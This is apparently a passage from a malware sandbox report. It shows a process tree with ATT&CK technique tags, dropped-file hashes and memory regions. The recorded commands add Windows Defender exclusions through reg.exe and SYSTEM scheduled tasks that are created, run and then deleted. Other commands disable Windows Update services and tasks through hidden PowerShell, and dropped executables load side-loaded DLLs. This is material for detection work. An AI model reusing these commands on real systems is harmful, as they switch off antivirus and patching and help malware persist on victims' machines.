                                      reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:3036
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:556
                                    • C:\Windows\SysWOW64\reg.exe
                                      reg add "HKLM\Software\Policies\Microsoft\Windows\WindowsUpdate\AU" /v NoAutoUpdate /t REG_DWORD /d 1 /f
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:1012
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -NoProfile -WindowStyle Hidden -Command "& {Get-ScheduledTask -TaskPath '\Microsoft\Windows\InstallService\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateOrchestrator\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\UpdateAssistant\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WaaSMedic\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\Windows\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue; Get-ScheduledTask -TaskPath '\Microsoft\WindowsUpdate\*' | Disable-ScheduledTask -ErrorAction SilentlyContinue;}"
                                      4⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • System Location Discovery: System Language Discovery
                                      PID:3996
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    • System Location Discovery: System Language Discovery
                                    PID:3560
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:1204
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:880
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Delete /TN "Task1" /F
                                      4⤵
                                      • System Location Discovery: System Language Discovery
                                      PID:2844
                                  • C:\Windows\SysWOW64\cmd.exe
                                    "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                    3⤵
                                    • Indicator Removal: Clear Persistence
                                    PID:404
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f"
                                      4⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:2604
                                    • C:\Windows\SysWOW64\schtasks.exe
                                      SCHTASKS /Run /TN "Task1"
                                      4⤵
                                        PID:2264
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Delete /TN "Task1" /F
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4592
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                      3⤵
                                      • Indicator Removal: Clear Persistence
                                      • System Location Discovery: System Language Discovery
                                      PID:4292
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:2872
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Run /TN "Task1"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:4532
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Delete /TN "Task1" /F
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        PID:2348
                                    • C:\Windows\SysWOW64\cmd.exe
                                      "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F
                                      3⤵
                                      • Indicator Removal: Clear Persistence
                                      PID:2124
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\Admin\Documents\" /t REG_DWORD /d 0 /f"
                                        4⤵
                                        • System Location Discovery: System Language Discovery
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:412
                                      • C:\Windows\SysWOW64\schtasks.exe
                                        SCHTASKS /Run /TN "Task1"
                                        4⤵
                                          PID:180
                                        • C:\Windows\SysWOW64\schtasks.exe
                                          SCHTASKS /Delete /TN "Task1" /F
                                          4⤵
                                          • System Location Discovery: System Language Discovery
                                          PID:1552
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\CA3JTe" /t REG_DWORD /d 0 /f
                                    1⤵
                                    • Executes a command shell one-liner
                                    • Suspicious use of WriteProcessMemory
                                    PID:3212
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Public\CA3JTe" /t REG_DWORD /d 0 /f
                                      2⤵
                                      • Windows security bypass
                                      PID:3384
                                  • C:\Windows\system32\cmd.exe
                                    cmd.exe
                                    1⤵
                                      PID:1200
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:4748
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:1684
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:5036
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:4016
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      • Suspicious use of WriteProcessMemory
                                      PID:2080
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:3900
                                    • C:\Program Files (x86)\Dpt9ZI\Dpt9ZI.exe
                                      "C:\Program Files (x86)\Dpt9ZI\Dpt9ZI.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:4764
                                    • C:\Program Files (x86)\QgeOsJ271\O2b21Mi.exe
                                      "C:\Program Files (x86)\QgeOsJ271\O2b21Mi.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:4772
                                    • C:\Program Files (x86)\Dpt9ZI\Dpt9ZI.exe
                                      "C:\Program Files (x86)\Dpt9ZI\Dpt9ZI.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:1552
                                    • C:\Program Files (x86)\QgeOsJ271\O2b21Mi.exe
                                      "C:\Program Files (x86)\QgeOsJ271\O2b21Mi.exe"
                                      1⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      • System Location Discovery: System Language Discovery
                                      PID:3188
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\Dpt9ZI" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:4436
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)\Dpt9ZI" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:4336
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:400
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:1996
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:4312
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:2308
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:1968
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:4016
                                    • C:\Windows\system32\cmd.exe
                                      cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                      1⤵
                                      • Executes a command shell one-liner
                                      PID:5060
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\Admin\Documents" /t REG_DWORD /d 0 /f
                                        2⤵
                                        • Windows security bypass
                                        PID:4760

                                    Network

                                          MITRE ATT&CK Enterprise v16

                                          Replay Monitor

                                          Loading Replay Monitor...

                                          Downloads

                                          e58ade0.rbs

                                          • Path C:\Config.Msi\e58ade0.rbs
                                          • Size 7KB
                                          • SHA256 9532201b4f1214c4a2f5868b2722edaa729d59d11132a6e80e7b8425a066d0ec
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          Dpt9ZI.exe

                                          • Path C:\Program Files (x86)\Dpt9ZI\Dpt9ZI.exe
                                          • Size 145KB
                                          • SHA256 6d6ba2bc9ad414837826f7278bc3e0116f1aeda02d0c2284ed65819f5d9180a8
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          XPSPLOG.dll

                                          • Path C:\Program Files (x86)\Dpt9ZI\XPSPLOG.dll
                                          • Size 4.6MB
                                          • SHA256 7a6af527b4dfe5256a65e2f76bc60ebf2719832dbaeaf1f94541d3aa45656c79
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          image.png

                                          • Path C:\Program Files (x86)\Dpt9ZI\image.png
                                          • Size 5.0MB
                                          • SHA256 60dd4283e1e5601d3f816ee98c5ed8f78aad8a2ac7eae3b55ac530b7e4fad0c9
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          thumbs.db

                                          • Path C:\Program Files (x86)\Dpt9ZI\thumbs.db
                                          • Size 358KB
                                          • SHA256 47df2a55f6e67b70d6bed96946512c1a4aca9e6f7140285c0c286950d5011135
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          XPSPLOG.dll

                                          • Path C:\Program Files (x86)\QgeOsJ271\XPSPLOG.dll
                                          • Size 4.6MB
                                          • SHA256 6b508fc993bef52ad3819e1d486b672e3ffd56c96caeb555825df3445a26ef5d
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          image.png

                                          • Path C:\Program Files (x86)\QgeOsJ271\image.png
                                          • Size 5.0MB
                                          • SHA256 242c56266387d2887dfd16cb196e3f660f6c0b47051a218e3d360770be1f7a18
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          powershell.exe.log

                                          • Path C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
                                          • Size 2KB
                                          • SHA256 92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
                                          • MD5 SHA1 SHA512 TLSH

                                          StartupProfileData-NonInteractive

                                          • Path C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                          • Size 18KB
                                          • SHA256 9fd711364bbd3b8b775c7b65dd1af4767279c5b3dd0825b938767ba0e9e46202
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          __PSScriptPolicyTest_g4j1fntm.jfv.ps1

                                          • Path C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g4j1fntm.jfv.ps1
                                          • Size 60B
                                          • SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
                                          • MD5 SHA1 SHA512 TLSH

                                          KypqmH.exe

                                          • Path C:\Users\Public\CA3JTe\KypqmH.exe
                                          • Size 135KB
                                          • SHA256 676a2a7b94ca2f8ec76352ee656e4d075bb342bd7ad6efbc7c19c060001eace7
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          UxEnhance64.dll

                                          • Path C:\Users\Public\CA3JTe\UxEnhance64.dll
                                          • Size 3.1MB
                                          • SHA256 43607f02385045c456c063de20c950ba60829412e75cd3ad2cb9f86127f47141
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          adoresd.dat

                                          • Path C:\Users\Public\CA3JTe\adoresd.dat
                                          • Size 4.7MB
                                          • SHA256 206c4bd4ca48eed8a7b2aef9e9aa6774d9eda25e62211f316e6347f00fbce23f
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          msadox.tb

                                          • Path C:\Users\Public\CA3JTe\msadox.tb
                                          • Size 8KB
                                          • SHA256 64972a111409e3eeb435be267158aa2880ab7300996472bf201297158e935f3b
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          destopbak.ini

                                          • Path C:\Users\Public\Music\destopbak.ini
                                          • Size 2B
                                          • SHA256 dd1e2826c0124a6d4f7397a5a71f633928926c0608b62fb9e615ba778acc39ff
                                          • MD5 SHA1 SHA512

                                          MSIAF57.tmp

                                          • Path C:\Windows\Installer\MSIAF57.tmp
                                          • Size 7.5MB
                                          • SHA256 a67b0d3ea524701352723b1b52f15b3a1cac7f953391c03ffad0c38d336c6fcd
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          e58addf.msi

                                          • Path C:\Windows\Installer\e58addf.msi
                                          • Size 7.6MB
                                          • SHA256 0f222defec009c65ff1d41ceff228c4f3c5ab9f7f3877724801729ba6f6275bb
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          metadata-2

                                          • Path \??\GLOBALROOT\Device\HarddiskVolumeShadowCopy2\System Volume Information\SPP\metadata-2
                                          • Size 24.1MB
                                          • SHA256 2fbefb0da38bf4dc7a38ba9039b9521411d5ed56aca203d4780b5aedeb90029e
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          {5a1d6a2c-8824-4a2e-9476-9e5ff14cf558}_OnDiskSnapshotProp

                                          • Path \??\Volume{4588d6e0-0000-0000-0000-d01200000000}\System Volume Information\SPP\OnlineMetadataCache\{5a1d6a2c-8824-4a2e-9476-9e5ff14cf558}_OnDiskSnapshotProp
                                          • Size 6KB
                                          • SHA256 89350188ee69bdac56737393125dad99a3262538bcc8115860cb0391be3b445a
                                          • MD5 SHA1 SHA512 SSDEEP TLSH

                                          xxxx.ini

                                          • Path \??\c:\xxxx.ini
                                          • Size 2B
                                          • SHA256 7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6
                                          • MD5 SHA1 SHA512

                                          memory/1552-283-0x00000000010F0000-0x00000000010F1000-memory.dmp

                                          memory/1552-276-0x0000000001110000-0x0000000001111000-memory.dmp

                                          memory/1552-277-0x0000000003930000-0x0000000004137000-memory.dmp

                                          memory/1552-265-0x0000000074B90000-0x00000000752DA000-memory.dmp

                                          memory/1552-272-0x0000000003930000-0x0000000004137000-memory.dmp

                                          memory/1552-264-0x00000000010F0000-0x00000000010F1000-memory.dmp

                                          memory/2152-317-0x0000000007B40000-0x0000000007BE3000-memory.dmp

                                          memory/2152-293-0x0000000005A50000-0x0000000006078000-memory.dmp

                                          memory/2152-308-0x000000006EDF0000-0x000000006EE3C000-memory.dmp

                                          memory/2152-307-0x0000000007B00000-0x0000000007B32000-memory.dmp

                                          memory/2152-319-0x0000000007C60000-0x0000000007C7A000-memory.dmp

                                          memory/2152-318-0x00000000082B0000-0x000000000892A000-memory.dmp

                                          memory/2152-306-0x00000000069D0000-0x0000000006A1C000-memory.dmp

                                          memory/2152-305-0x0000000006940000-0x000000000695E000-memory.dmp

                                          memory/2152-320-0x0000000007CD0000-0x0000000007CDA000-memory.dmp

                                          memory/2152-322-0x0000000007E60000-0x0000000007E71000-memory.dmp

                                          memory/2152-302-0x0000000006360000-0x00000000066B4000-memory.dmp

                                          memory/2152-295-0x0000000006280000-0x00000000062E6000-memory.dmp

                                          memory/2152-296-0x00000000062F0000-0x0000000006356000-memory.dmp

                                          memory/2152-323-0x0000000007E90000-0x0000000007E9E000-memory.dmp

                                          memory/2152-294-0x00000000061E0000-0x0000000006202000-memory.dmp

                                          memory/2152-316-0x0000000006ED0000-0x0000000006EEE000-memory.dmp

                                          memory/2152-324-0x0000000007EA0000-0x0000000007EB4000-memory.dmp

                                          memory/2152-292-0x0000000003010000-0x0000000003046000-memory.dmp

                                          memory/2152-321-0x0000000007EE0000-0x0000000007F76000-memory.dmp

                                          memory/2152-326-0x0000000007F80000-0x0000000007F88000-memory.dmp

                                          memory/2152-325-0x0000000007FA0000-0x0000000007FBA000-memory.dmp

                                          memory/3188-280-0x0000000000900000-0x0000000000901000-memory.dmp

                                          memory/3188-285-0x00000000008E0000-0x00000000008E1000-memory.dmp

                                          memory/3188-281-0x0000000002F40000-0x0000000003747000-memory.dmp

                                          memory/3188-268-0x00000000008E0000-0x00000000008E1000-memory.dmp

                                          memory/3188-274-0x0000000002F40000-0x0000000003747000-memory.dmp

                                          memory/3188-269-0x0000000072EC0000-0x000000007360A000-memory.dmp

                                          memory/3996-331-0x0000000005580000-0x00000000058D4000-memory.dmp

                                          memory/3996-340-0x00000000061F0000-0x000000000623C000-memory.dmp

                                          memory/3996-341-0x000000006EE90000-0x000000006EEDC000-memory.dmp

                                          memory/3996-349-0x0000000006E80000-0x0000000006F23000-memory.dmp

                                          memory/3996-350-0x0000000007180000-0x0000000007191000-memory.dmp

                                          memory/4328-79-0x0000021F3BBF0000-0x0000021F3BC7A000-memory.dmp

                                          memory/4328-66-0x0000021F3B230000-0x0000021F3BAC1000-memory.dmp

                                          memory/4328-87-0x0000021F3B230000-0x0000021F3BAC1000-memory.dmp

                                          memory/4328-77-0x0000021F3BAD0000-0x0000021F3BB1E000-memory.dmp

                                          memory/4328-78-0x0000021F3BBF0000-0x0000021F3BC7A000-memory.dmp

                                          memory/4328-80-0x0000021F3BBF0000-0x0000021F3BC7A000-memory.dmp

                                          memory/4328-53-0x00007FFCCD3F0000-0x00007FFCCD90E000-memory.dmp

                                          memory/4328-52-0x00007FFCEBF30000-0x00007FFCEBF32000-memory.dmp

                                          memory/4328-58-0x0000021F3B230000-0x0000021F3BAC1000-memory.dmp

                                          memory/4328-65-0x0000021F3B230000-0x0000021F3BAC1000-memory.dmp

                                          memory/4328-61-0x0000021F3B230000-0x0000021F3BAC1000-memory.dmp

                                          memory/4328-86-0x0000021F3B230000-0x0000021F3BAC1000-memory.dmp

                                          memory/4328-68-0x0000021F3B230000-0x0000021F3BAC1000-memory.dmp

                                          memory/4328-67-0x0000021F3B230000-0x0000021F3BAC1000-memory.dmp

                                          memory/4328-60-0x00007FFCEBF40000-0x00007FFCEBF42000-memory.dmp

                                          memory/4328-72-0x0000021F3B230000-0x0000021F3BAC1000-memory.dmp

                                          memory/4328-81-0x0000021F3BBF0000-0x0000021F3BC7A000-memory.dmp

                                          memory/4436-38-0x00007FFCDC2C0000-0x00007FFCDC2D0000-memory.dmp

                                          memory/4436-18-0x00007FFCDC2C0000-0x00007FFCDC2D0000-memory.dmp

                                          memory/4436-15-0x00007FFCCD2D0000-0x00007FFCCD90A000-memory.dmp

                                          memory/4436-14-0x00007FFCEBF30000-0x00007FFCEBF32000-memory.dmp

                                          memory/4632-181-0x0000000003950000-0x0000000004157000-memory.dmp

                                          memory/4632-286-0x0000000003950000-0x0000000004157000-memory.dmp

                                          memory/4632-176-0x0000000001640000-0x0000000001641000-memory.dmp

                                          memory/4632-251-0x0000000003950000-0x0000000004157000-memory.dmp

                                          memory/4632-184-0x0000000003950000-0x0000000004157000-memory.dmp

                                          memory/4632-183-0x0000000002E10000-0x0000000002E11000-memory.dmp

                                          memory/4632-188-0x0000000003950000-0x0000000004157000-memory.dmp

                                          memory/4632-195-0x00000000042E0000-0x00000000042F4000-memory.dmp

                                          memory/4632-207-0x0000000003950000-0x0000000004157000-memory.dmp

                                          memory/4632-177-0x0000000074B90000-0x00000000752DA000-memory.dmp

                                          memory/4632-230-0x0000000010000000-0x0000000010061000-memory.dmp

                                          memory/4764-212-0x00000000009F0000-0x00000000009F1000-memory.dmp

                                          memory/4764-221-0x0000000003490000-0x0000000003C97000-memory.dmp

                                          memory/4764-213-0x0000000074B90000-0x00000000752DA000-memory.dmp

                                          memory/4764-243-0x0000000003490000-0x0000000003C97000-memory.dmp

                                          memory/4764-242-0x0000000001180000-0x0000000001181000-memory.dmp

                                          memory/4764-250-0x00000000009F0000-0x00000000009F1000-memory.dmp

                                          memory/4772-228-0x00000000033A0000-0x0000000003BA7000-memory.dmp

                                          memory/4772-217-0x0000000073DD0000-0x000000007451A000-memory.dmp

                                          memory/4772-216-0x00000000008C0000-0x00000000008C1000-memory.dmp

                                          memory/4772-246-0x00000000033A0000-0x0000000003BA7000-memory.dmp

                                          memory/4772-252-0x00000000008C0000-0x00000000008C1000-memory.dmp

                                          memory/4772-245-0x0000000000930000-0x0000000000931000-memory.dmp